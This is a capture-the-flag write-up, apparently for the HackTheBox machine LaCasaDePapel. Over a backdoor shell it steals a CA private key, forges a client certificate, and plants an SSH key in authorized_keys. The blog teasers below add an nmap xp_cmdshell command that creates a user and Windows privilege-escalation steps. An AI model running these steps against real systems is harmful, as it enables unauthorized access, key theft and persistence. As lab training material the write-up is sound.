Skip to main content

Creating Self Signed Certificate


Some times,we need a Self signed certificate. So, to create it we need the CA's website.cer file and CA's private key.


lets download the ca certificate from the website

 Import the certificate and save it




Lets start creating a new certificate:

Example from LaCasaDePapel

rlwrap nc 10.10.10.131 6200 //gets a responsive shell

scandir("/home/berin")


file_get_contents("/home/nairobi/ca.key")


Lets vertify the private key we have matches the certificate we have.

openssl pkey -in ca.key -pubout

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----


openssl x509 -in lacasadepapelhtb.crt -pubkey -noout

openssl x509 -in lacasadepapelhtb.crt -pubkey -noout both of them match, so the private key(ca.key). So, we have the private key from the cerfificate authroity to trust this server. we can be use this to create a client certificate




lets create a Client.key

Creating a Client Key:

openssl genrsa -out client.key 4096


Creating a certificate signing request

openssl req -new -key client.key -out client.csr


openssl x509 -req -in client.csr -CA web.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer



This is the list of files that we got as of now.





firefox doesnt accept this, it has to be pkcs12, so we need to convert this,,

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12



client.p12 is a combination of client.key and client.cer
client.cer is just the signed version of client.csr



  go to firefox → certificates → your certificates → import


Add the certificate → ok



  Go to Authorities → import -->

  select the certificate that you downloaded from the website → ok

click on edit Trust → tick both the options 


Now if you try accessing the website, you can get into it without any problem..

==================================================


Creating our own SSH key to add it into Authorized keys to get a shell


create our own ssh key
 ssh-keygen

two files will be created


copy id_rsa.pub key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali



rlwrap nc 10.10.10.131 6200
scandir("/home/dali/.ssh")



file_put_contents("/home/dali/.ssh/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali")


or else file append to add the data after it instead of replace the data in the file.


file_put_contents("/home/dali/.ssh/authorized_keys","ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJUte6FKs4uwuYNVjXL6bbMtfo+e/sg6aCTZQSFfi+Skb1Tax/NuROjmGAI/qWeoan0E5MhwozUkP/f+6Oqe3Uy2bBbUQclb/MAkOy5RZzUflZA4kCRaOwyCmG9m1IqhiETj/m1MNuRC+srOk93Wzcsdd7HBefhLap4sMlX1KQ+ZxYTcj+2CiyihiTcuIqgxlJo1fi2RiIVkL2KLwC4YWckcNL6QLkU5K9b0hgGsZmir7zNze2F0RYCU5NTikt4CmUYy7ogdi/0OH/N8FjMFSi70jQIw2fVMgB0ggzmmdyasjGb6MTt3I8RmbGik6diaGHmdFLKd3A49dFd3wHCHW/ root@kali", FILE_APPEND)





file_get_contents("/home/dali/.ssh/authorized_keys")




chmod 600 id_rsa
ssh -i id_rsa dali@10.10.10.131













Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in